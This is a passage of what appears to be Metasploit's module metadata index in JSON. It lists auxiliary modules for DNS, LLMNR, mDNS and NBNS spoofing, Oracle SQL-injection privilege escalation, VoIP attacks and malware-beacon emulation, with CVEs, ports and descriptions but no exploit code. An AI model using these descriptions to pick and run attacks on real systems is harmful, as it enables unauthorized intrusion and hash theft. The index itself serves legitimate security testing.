"mod_time": "2017-08-28 20:17:58 +0000",
"path": "/modules/auxiliary/spoof/dns/compare_results.rb",
"is_install_path": true,
"ref_name": "spoof/dns/compare_results",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_spoof/dns/native_spoofer": {
"name": "Native DNS Spoofer (Example)",
"full_name": "auxiliary/spoof/dns/native_spoofer",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"RageLtMan <rageltman@sempervictus>"
],
"description": "This module provides a Rex based DNS service to resolve queries intercepted\n via the capture mixin. Configure STATIC_ENTRIES to contain host-name mappings\n desired for spoofing using a hostsfile or space/semicolon separated entries.\n In default configuration, the service operates as a normal native DNS server\n with the exception of consuming from and writing to the wire as opposed to a\n listening socket. Best when compromising routers or spoofing L2 in order to\n prevent return of the real reply which causes a race condition. The method\n by which replies are filtered is up to the user (though iptables works fine).",
"references": [
],
"platform": "",
"arch": "",
"rport": 53,
"autofilter_ports": [
53
],
"autofilter_services": [
"dns"
],
"targets": null,
"mod_time": "2018-01-31 23:44:51 +0000",
"path": "/modules/auxiliary/spoof/dns/native_spoofer.rb",
"is_install_path": true,
"ref_name": "spoof/dns/native_spoofer",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_spoof/llmnr/llmnr_response": {
"name": "LLMNR Spoofer",
"full_name": "auxiliary/spoof/llmnr/llmnr_response",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Robin Francois <rof@navixia.com>"
],
"description": "LLMNR (Link-local Multicast Name Resolution) is the successor of NetBIOS (Windows Vista and up) and is used to\n resolve the names of neighboring computers. This module forges LLMNR responses by listening for LLMNR requests\n sent to the LLMNR multicast address (224.0.0.252) and responding with a user-defined spoofed IP address.",
"references": [
"URL-http://www.ietf.org/rfc/rfc4795.txt"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/spoof/llmnr/llmnr_response.rb",
"is_install_path": true,
"ref_name": "spoof/llmnr/llmnr_response",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_spoof/mdns/mdns_response": {
"name": "mDNS Spoofer",
"full_name": "auxiliary/spoof/mdns/mdns_response",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Joe Testa <jtesta@positronsecurity.com>",
"James Lee <egypt@metasploit.com>",
"Robin Francois <rof@navixia.com>"
],
"description": "This module will listen for mDNS multicast requests on 5353/udp for A and AAAA record queries, and respond with a spoofed IP address (assuming the request matches our regex).",
"references": [
"URL-https://tools.ietf.org/html/rfc6762"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/spoof/mdns/mdns_response.rb",
"is_install_path": true,
"ref_name": "spoof/mdns/mdns_response",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_spoof/nbns/nbns_response": {
"name": "NetBIOS Name Service Spoofer",
"full_name": "auxiliary/spoof/nbns/nbns_response",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Tim Medin <tim@securitywhole.com>"
],
"description": "This module forges NetBIOS Name Service (NBNS) responses. It will listen for NBNS requests\n sent to the local subnet's broadcast address and spoof a response, redirecting the querying\n machine to an IP of the attacker's choosing. Combined with auxiliary/server/capture/smb or\n auxiliary/server/capture/http_ntlm it is a highly effective means of collecting crackable hashes on\n common networks.\n\n This module must be run as root and will bind to udp/137 on all interfaces.",
"references": [
"URL-http://www.packetstan.com/2011/03/nbns-spoofing-on-your-way-to-world.html"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/spoof/nbns/nbns_response.rb",
"is_install_path": true,
"ref_name": "spoof/nbns/nbns_response",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_spoof/replay/pcap_replay": {
"name": "Pcap Replay Utility",
"full_name": "auxiliary/spoof/replay/pcap_replay",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"amaloteaux <alex_maloteaux@metasploit.com>"
],
"description": "Replay a pcap capture file",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/spoof/replay/pcap_replay.rb",
"is_install_path": true,
"ref_name": "spoof/replay/pcap_replay",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_sqli/oracle/dbms_cdc_ipublish": {
"name": "Oracle DB SQL Injection via SYS.DBMS_CDC_IPUBLISH.ALTER_HOTLOG_INTERNAL_CSOURCE",
"full_name": "auxiliary/sqli/oracle/dbms_cdc_ipublish",
"rank": 300,
"disclosure_date": "2008-10-22",
"type": "auxiliary",
"author": [
"MC <mc@metasploit.com>"
],
"description": "The module exploits an sql injection flaw in the ALTER_HOTLOG_INTERNAL_CSOURCE\n procedure of the PL/SQL package DBMS_CDC_IPUBLISH. Any user with execute privilege\n on the vulnerable package can exploit this vulnerability. By default, users granted\n EXECUTE_CATALOG_ROLE have the required privilege. Affected versions: Oracle Database\n Server versions 10gR1, 10gR2 and 11gR1. Fixed with October 2008 CPU.",
"references": [
"CVE-2008-3996",
"OSVDB-49321"
],
"platform": "",
"arch": "",
"rport": "1521",
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/sqli/oracle/dbms_cdc_ipublish.rb",
"is_install_path": true,
"ref_name": "sqli/oracle/dbms_cdc_ipublish",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_sqli/oracle/dbms_cdc_publish": {
"name": "Oracle DB SQL Injection via SYS.DBMS_CDC_PUBLISH.ALTER_AUTOLOG_CHANGE_SOURCE",
"full_name": "auxiliary/sqli/oracle/dbms_cdc_publish",
"rank": 300,
"disclosure_date": "2008-10-22",
"type": "auxiliary",
"author": [
"MC <mc@metasploit.com>"
],
"description": "The module exploits an sql injection flaw in the ALTER_AUTOLOG_CHANGE_SOURCE\n procedure of the PL/SQL package DBMS_CDC_PUBLISH. Any user with execute privilege\n on the vulnerable package can exploit this vulnerability. By default, users granted\n EXECUTE_CATALOG_ROLE have the required privilege.\n Affected versions: Oracle Database Server versions 10gR1, 10gR2 and 11gR1.\n Fixed with October 2008 CPU.",
"references": [
"CVE-2008-3995",
"OSVDB-49320"
],
"platform": "",
"arch": "",
"rport": "1521",
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/sqli/oracle/dbms_cdc_publish.rb",
"is_install_path": true,
"ref_name": "sqli/oracle/dbms_cdc_publish",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_sqli/oracle/dbms_cdc_publish2": {
"name": "Oracle DB SQL Injection via SYS.DBMS_CDC_PUBLISH.DROP_CHANGE_SOURCE",
"full_name": "auxiliary/sqli/oracle/dbms_cdc_publish2",
"rank": 300,
"disclosure_date": "2010-04-26",
"type": "auxiliary",
"author": [
"MC <mc@metasploit.com>"
],
"description": "The module exploits an sql injection flaw in the DROP_CHANGE_SOURCE\n procedure of the PL/SQL package DBMS_CDC_PUBLISH. Any user with execute privilege\n on the vulnerable package can exploit this vulnerability. By default, users granted\n EXECUTE_CATALOG_ROLE have the required privilege.",
"references": [
"CVE-2010-0870",
"OSVDB-63772",
"URL-http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuapr2010.html"
],
"platform": "",
"arch": "",
"rport": "1521",
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/sqli/oracle/dbms_cdc_publish2.rb",
"is_install_path": true,
"ref_name": "sqli/oracle/dbms_cdc_publish2",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_sqli/oracle/dbms_cdc_publish3": {
"name": "Oracle DB SQL Injection via SYS.DBMS_CDC_PUBLISH.CREATE_CHANGE_SET",
"full_name": "auxiliary/sqli/oracle/dbms_cdc_publish3",
"rank": 300,
"disclosure_date": "2010-10-13",
"type": "auxiliary",
"author": [
"MC <mc@metasploit.com>"
],
"description": "The module exploits an sql injection flaw in the CREATE_CHANGE_SET\n procedure of the PL/SQL package DBMS_CDC_PUBLISH. Any user with execute privilege\n on the vulnerable package can exploit this vulnerability. By default, users granted\n EXECUTE_CATALOG_ROLE have the required privilege.",
"references": [
"CVE-2010-2415",
"OSVDB-70078",
"URL-http://www.oracle.com/technetwork/topics/security/cpuoct2010-175626.html"
],
"platform": "",
"arch": "",
"rport": "1521",
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/sqli/oracle/dbms_cdc_publish3.rb",
"is_install_path": true,
"ref_name": "sqli/oracle/dbms_cdc_publish3",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_sqli/oracle/dbms_cdc_subscribe_activate_subscription": {
"name": "Oracle DB SQL Injection via SYS.DBMS_CDC_SUBSCRIBE.ACTIVATE_SUBSCRIPTION",
"full_name": "auxiliary/sqli/oracle/dbms_cdc_subscribe_activate_subscription",
"rank": 300,
"disclosure_date": "2005-04-18",
"type": "auxiliary",
"author": [
"Esteban Martinez Fayo",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module will escalate an Oracle DB user to DBA by exploiting a sql injection\n bug in the SYS.DBMS_CDC_SUBSCRIBE.ACTIVATE_SUBSCRIPTION package/function.\n This vulnerability affects to Oracle Database Server 9i up to 9.2.0.5 and\n 10g up to 10.1.0.4.",
"references": [
"CVE-2005-4832",
"BID-13236",
"OSVDB-15553",
"URL-http://www.appsecinc.com/resources/alerts/oracle/2005-02.html",
"URL-http://www.argeniss.com/research/OraDBMS_CDC_SUBSCRIBEExploit.txt"
],
"platform": "",
"arch": "",
"rport": "1521",
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-08-28 20:17:58 +0000",
"path": "/modules/auxiliary/sqli/oracle/dbms_cdc_subscribe_activate_subscription.rb",
"is_install_path": true,
"ref_name": "sqli/oracle/dbms_cdc_subscribe_activate_subscription",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_sqli/oracle/dbms_export_extension": {
"name": "Oracle DB SQL Injection via DBMS_EXPORT_EXTENSION",
"full_name": "auxiliary/sqli/oracle/dbms_export_extension",
"rank": 300,
"disclosure_date": "2006-04-26",
"type": "auxiliary",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module will escalate an Oracle DB user to DBA by exploiting a\n sql injection bug in the DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_METADATA package.\n\n Note: This module has been tested against 9i, 10gR1 and 10gR2.",
"references": [
"CVE-2006-2081",
"OSVDB-25002",
"BID-17699",
"URL-http://www.red-database-security.com/exploits/oracle-sql-injection-oracle-dbms_export_extension.html"
],
"platform": "",
"arch": "",
"rport": "1521",
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-08-28 20:17:58 +0000",
"path": "/modules/auxiliary/sqli/oracle/dbms_export_extension.rb",
"is_install_path": true,
"ref_name": "sqli/oracle/dbms_export_extension",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_sqli/oracle/dbms_metadata_get_granted_xml": {
"name": "Oracle DB SQL Injection via SYS.DBMS_METADATA.GET_GRANTED_XML",
"full_name": "auxiliary/sqli/oracle/dbms_metadata_get_granted_xml",
"rank": 300,
"disclosure_date": "2008-01-05",
"type": "auxiliary",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module will escalate an Oracle DB user to DBA by exploiting a sql injection\n bug in the SYS.DBMS_METADATA.GET_GRANTED_XML package/function.",
"references": [
"URL-http://www.metasploit.com"
],
"platform": "",
"arch": "",
"rport": "1521",
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-08-28 20:17:58 +0000",
"path": "/modules/auxiliary/sqli/oracle/dbms_metadata_get_granted_xml.rb",
"is_install_path": true,
"ref_name": "sqli/oracle/dbms_metadata_get_granted_xml",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_sqli/oracle/dbms_metadata_get_xml": {
"name": "Oracle DB SQL Injection via SYS.DBMS_METADATA.GET_XML",
"full_name": "auxiliary/sqli/oracle/dbms_metadata_get_xml",
"rank": 300,
"disclosure_date": "2008-01-05",
"type": "auxiliary",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module will escalate an Oracle DB user to DBA by exploiting a sql injection\n bug in the SYS.DBMS_METADATA.GET_XML package/function.",
"references": [
"URL-http://www.metasploit.com"
],
"platform": "",
"arch": "",
"rport": "1521",
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-08-28 20:17:58 +0000",
"path": "/modules/auxiliary/sqli/oracle/dbms_metadata_get_xml.rb",
"is_install_path": true,
"ref_name": "sqli/oracle/dbms_metadata_get_xml",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_sqli/oracle/dbms_metadata_open": {
"name": "Oracle DB SQL Injection via SYS.DBMS_METADATA.OPEN",
"full_name": "auxiliary/sqli/oracle/dbms_metadata_open",
"rank": 300,
"disclosure_date": "2008-01-05",
"type": "auxiliary",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module will escalate a Oracle DB user to DBA by exploiting an sql injection\n bug in the SYS.DBMS_METADATA.OPEN package/function.",
"references": [
"URL-http://www.metasploit.com"
],
"platform": "",
"arch": "",
"rport": "1521",
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/sqli/oracle/dbms_metadata_open.rb",
"is_install_path": true,
"ref_name": "sqli/oracle/dbms_metadata_open",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_sqli/oracle/droptable_trigger": {
"name": "Oracle DB SQL Injection in MDSYS.SDO_TOPO_DROP_FTBL Trigger",
"full_name": "auxiliary/sqli/oracle/droptable_trigger",
"rank": 300,
"disclosure_date": "2009-01-13",
"type": "auxiliary",
"author": [
"Sh2kerr <research[ad]dsec.ru>"
],
"description": "This module will escalate an Oracle DB user to MDSYS by exploiting a sql injection bug in\n the MDSYS.SDO_TOPO_DROP_FTBL trigger. After that exploit escalate user to DBA using \"CREATE ANY TRIGGER\" privilege\n given to MDSYS user by creating evil trigger in system scheme (2-stage attack).",
"references": [
"CVE-2008-3979",
"OSVDB-51354",
"URL-http://www.securityfocus.com/archive/1/500061",
"URL-http://www.ngssoftware.com/"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-08-28 20:17:58 +0000",
"path": "/modules/auxiliary/sqli/oracle/droptable_trigger.rb",
"is_install_path": true,
"ref_name": "sqli/oracle/droptable_trigger",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_sqli/oracle/jvm_os_code_10g": {
"name": "Oracle DB 10gR2, 11gR1/R2 DBMS_JVM_EXP_PERMS OS Command Execution",
"full_name": "auxiliary/sqli/oracle/jvm_os_code_10g",
"rank": 300,
"disclosure_date": "2010-02-01",
"type": "auxiliary",
"author": [
"sid <sid@notsosecure.com>"
],
"description": "This module exploits a flaw (0 day) in DBMS_JVM_EXP_PERMS package that allows\n any user with create session privilege to grant themselves java IO privileges.\n Identified by David Litchfield. Works on 10g R2, 11g R1 and R2 (Windows only)",
"references": [
"CVE-2010-0866",
"OSVDB-62184",
"URL-http://blackhat.com/html/bh-dc-10/bh-dc-10-archives.html#Litchfield",
"URL-http://www.notsosecure.com/folder2/2010/02/04/hacking-oracle-11g/"
],
"platform": "",
"arch": "",
"rport": "1521",
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/sqli/oracle/jvm_os_code_10g.rb",
"is_install_path": true,
"ref_name": "sqli/oracle/jvm_os_code_10g",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_sqli/oracle/jvm_os_code_11g": {
"name": "Oracle DB 11g R1/R2 DBMS_JVM_EXP_PERMS OS Code Execution",
"full_name": "auxiliary/sqli/oracle/jvm_os_code_11g",
"rank": 300,
"disclosure_date": "2010-02-01",
"type": "auxiliary",
"author": [
"sid <sid@notsosecure.com>"
],
"description": "This module exploits a flaw (0 day) in DBMS_JVM_EXP_PERMS package that allows\n any user with create session privilege to grant themselves java IO privileges.\n Identified by David Litchfield. Works on 11g R1 and R2 (Windows only).",
"references": [
"CVE-2010-0866",
"OSVDB-62184",
"URL-http://blackhat.com/html/bh-dc-10/bh-dc-10-archives.html#Litchfield",
"URL-http://www.notsosecure.com/folder2/2010/02/04/hacking-oracle-11g/"
],
"platform": "",
"arch": "",
"rport": "1521",
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/sqli/oracle/jvm_os_code_11g.rb",
"is_install_path": true,
"ref_name": "sqli/oracle/jvm_os_code_11g",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_sqli/oracle/lt_compressworkspace": {
"name": "Oracle DB SQL Injection via SYS.LT.COMPRESSWORKSPACE",
"full_name": "auxiliary/sqli/oracle/lt_compressworkspace",
"rank": 300,
"disclosure_date": "2008-10-13",
"type": "auxiliary",
"author": [
"CG <cg@carnal0wnage.com>"
],
"description": "This module exploits an sql injection flaw in the COMPRESSWORKSPACE\n procedure of the PL/SQL package SYS.LT. Any user with execute\n privilege on the vulnerable package can exploit this vulnerability.",
"references": [
"CVE-2008-3982",
"OSVDB-49324",
"URL-http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuoct2008.html"
],
"platform": "",
"arch": "",
"rport": "1521",
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/sqli/oracle/lt_compressworkspace.rb",
"is_install_path": true,
"ref_name": "sqli/oracle/lt_compressworkspace",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_sqli/oracle/lt_findricset_cursor": {
"name": "Oracle DB SQL Injection via SYS.LT.FINDRICSET Evil Cursor Method",
"full_name": "auxiliary/sqli/oracle/lt_findricset_cursor",
"rank": 300,
"disclosure_date": "2007-10-17",
"type": "auxiliary",
"author": [
"CG <cg@carnal0wnage.com>"
],
"description": "This module will escalate an Oracle DB user to DBA by exploiting\n a sql injection bug in the SYS.LT.FINDRICSET package via Evil\n Cursor technique. Tested on oracle 10.1.0.3.0 -- should work on\n thru 10.1.0.5.0 and supposedly on 11g. Fixed with Oracle Critical\n Patch update October 2007.",
"references": [
"CVE-2007-5511",
"OSVDB-40079",
"BID-26098",
"URL-http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuoct2007.html"
],
"platform": "",
"arch": "",
"rport": "1521",
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-08-28 20:17:58 +0000",
"path": "/modules/auxiliary/sqli/oracle/lt_findricset_cursor.rb",
"is_install_path": true,
"ref_name": "sqli/oracle/lt_findricset_cursor",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_sqli/oracle/lt_mergeworkspace": {
"name": "Oracle DB SQL Injection via SYS.LT.MERGEWORKSPACE",
"full_name": "auxiliary/sqli/oracle/lt_mergeworkspace",
"rank": 300,
"disclosure_date": "2008-10-22",
"type": "auxiliary",
"author": [
"CG <cg@carnal0wnage.com>"
],
"description": "This module exploits a sql injection flaw in the MERGEWORKSPACE\n procedure of the PL/SQL package SYS.LT. Any user with execute\n privilege on the vulnerable package can exploit this vulnerability.",
"references": [
"CVE-2008-3983",
"OSVDB-49325",
"URL-http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuoct2008.html",
"URL-http://www.dsecrg.com/pages/expl/show.php?id=23"
],
"platform": "",
"arch": "",
"rport": "1521",
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-08-28 20:17:58 +0000",
"path": "/modules/auxiliary/sqli/oracle/lt_mergeworkspace.rb",
"is_install_path": true,
"ref_name": "sqli/oracle/lt_mergeworkspace",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_sqli/oracle/lt_removeworkspace": {
"name": "Oracle DB SQL Injection via SYS.LT.REMOVEWORKSPACE",
"full_name": "auxiliary/sqli/oracle/lt_removeworkspace",
"rank": 300,
"disclosure_date": "2008-10-13",
"type": "auxiliary",
"author": [
"Sh2kerr <research[ad]dsecrg.com>"
],
"description": "This module exploits a sql injection flaw in the REMOVEWORKSPACE\n procedure of the PL/SQL package SYS.LT. Any user with execute\n privilege on the vulnerable package can exploit this vulnerability.",
"references": [
"CVE-2008-3984",
"OSVDB-49326"
],
"platform": "",
"arch": "",
"rport": "1521",
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-08-28 20:17:58 +0000",
"path": "/modules/auxiliary/sqli/oracle/lt_removeworkspace.rb",
"is_install_path": true,
"ref_name": "sqli/oracle/lt_removeworkspace",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_sqli/oracle/lt_rollbackworkspace": {
"name": "Oracle DB SQL Injection via SYS.LT.ROLLBACKWORKSPACE",
"full_name": "auxiliary/sqli/oracle/lt_rollbackworkspace",
"rank": 300,
"disclosure_date": "2009-05-04",
"type": "auxiliary",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a sql injection flaw in the ROLLBACKWORKSPACE\n procedure of the PL/SQL package SYS.LT. Any user with execute\n privilege on the vulnerable package can exploit this vulnerability.",
"references": [
"CVE-2009-0978",
"OSVDB-53734",
"URL-http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuapr2009.html"
],
"platform": "",
"arch": "",
"rport": "1521",
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-08-28 20:17:58 +0000",
"path": "/modules/auxiliary/sqli/oracle/lt_rollbackworkspace.rb",
"is_install_path": true,
"ref_name": "sqli/oracle/lt_rollbackworkspace",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_voip/asterisk_login": {
"name": "Asterisk Manager Login Utility",
"full_name": "auxiliary/voip/asterisk_login",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"dflah_ <dflah@alligatorteam.org>"
],
"description": "This module attempts to authenticate to an Asterisk Manager service. Please note\n that by default, Asterisk Call Management (port 5038) only listens locally, but\n this can be manually configured in file /etc/asterisk/manager.conf by the admin\n on the victim machine.",
"references": [
"URL-http://www.asterisk.org/astdocs/node201.html"
],
"platform": "",
"arch": "",
"rport": 5038,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/voip/asterisk_login.rb",
"is_install_path": true,
"ref_name": "voip/asterisk_login",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_voip/cisco_cucdm_call_forward": {
"name": "Viproy CUCDM IP Phone XML Services - Call Forwarding Tool",
"full_name": "auxiliary/voip/cisco_cucdm_call_forward",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"fozavci"
],
"description": "The BVSMWeb portal in the web framework in Cisco Unified Communications Domain Manager\n (CDM) 10 does not properly implement access control, which allows remote attackers to\n modify user information. This module exploits the vulnerability to configure unauthorized\n call forwarding.",
"references": [
"CVE-2014-3300",
"BID-68331"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/voip/cisco_cucdm_call_forward.rb",
"is_install_path": true,
"ref_name": "voip/cisco_cucdm_call_forward",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_voip/cisco_cucdm_speed_dials": {
"name": "Viproy CUCDM IP Phone XML Services - Speed Dial Attack Tool",
"full_name": "auxiliary/voip/cisco_cucdm_speed_dials",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"fozavci"
],
"description": "The BVSMWeb portal in the web framework in Cisco Unified Communications Domain Manager\n (CDM), before version 10, doesn't implement access control properly, which allows remote\n attackers to modify user information. This module exploits the vulnerability to make\n unauthorized speed dial entity manipulations.",
"references": [
"CVE-2014-3300",
"BID-68331"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-08-28 20:17:58 +0000",
"path": "/modules/auxiliary/voip/cisco_cucdm_speed_dials.rb",
"is_install_path": true,
"ref_name": "voip/cisco_cucdm_speed_dials",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_voip/sip_deregister": {
"name": "SIP Deregister Extension",
"full_name": "auxiliary/voip/sip_deregister",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"ChrisJohnRiley"
],
"description": "This module will attempt to deregister a SIP user from the provider. It\n has been tested successfully when the sip provider/server doesn't use REGISTER\n authentication.",
"references": [
],
"platform": "",
"arch": "",
"rport": 5060,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2019-03-05 04:43:37 +0000",
"path": "/modules/auxiliary/voip/sip_deregister.rb",
"is_install_path": true,
"ref_name": "voip/sip_deregister",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_voip/sip_invite_spoof": {
"name": "SIP Invite Spoof",
"full_name": "auxiliary/voip/sip_invite_spoof",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"David Maynor <dave@erratasec.com>",
"ChrisJohnRiley"
],
"description": "This module will create a fake SIP invite request making the targeted device ring\n and display fake caller id information.",
"references": [
],
"platform": "",
"arch": "",
"rport": 5060,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2019-03-05 04:43:37 +0000",
"path": "/modules/auxiliary/voip/sip_invite_spoof.rb",
"is_install_path": true,
"ref_name": "voip/sip_invite_spoof",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_voip/telisca_ips_lock_control": {
"name": "Telisca IPS Lock Cisco IP Phone Control",
"full_name": "auxiliary/voip/telisca_ips_lock_control",
"rank": 300,
"disclosure_date": "2015-12-17",
"type": "auxiliary",
"author": [
"Fakhir Karim Reda <karim.fakhir@gmail.com>",
"zirsalem"
],
"description": "This module allows an unauthenticated attacker to exercise the\n \"Lock\" and \"Unlock\" functionality of Telisca IPS Lock for Cisco IP\n Phones. This module should be run in the VoIP VLAN, and requires\n knowledge of the target phone's name (for example, SEP002497AB1D4B).\n\n Set ACTION to either LOCK or UNLOCK. UNLOCK is the default.",
"references": [
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/voip/telisca_ips_lock_control.rb",
"is_install_path": true,
"ref_name": "voip/telisca_ips_lock_control",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_vsploit/malware/dns/dns_mariposa": {
"name": "VSploit Mariposa DNS Query Module",
"full_name": "auxiliary/vsploit/malware/dns/dns_mariposa",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"MJC"
],
"description": "This module queries known Mariposa Botnet DNS records.",
"references": [
"URL-http://www.defintel.com/docs/Mariposa_Analysis.pdf"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/vsploit/malware/dns/dns_mariposa.rb",
"is_install_path": true,
"ref_name": "vsploit/malware/dns/dns_mariposa",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_vsploit/malware/dns/dns_query": {
"name": "VSploit DNS Beaconing Emulation",
"full_name": "auxiliary/vsploit/malware/dns/dns_query",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"MJC"
],
"description": "This module takes a list and emulates malicious DNS beaconing.",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/vsploit/malware/dns/dns_query.rb",
"is_install_path": true,
"ref_name": "vsploit/malware/dns/dns_query",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_vsploit/malware/dns/dns_zeus": {
"name": "VSploit Zeus DNS Query Module",
"full_name": "auxiliary/vsploit/malware/dns/dns_zeus",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
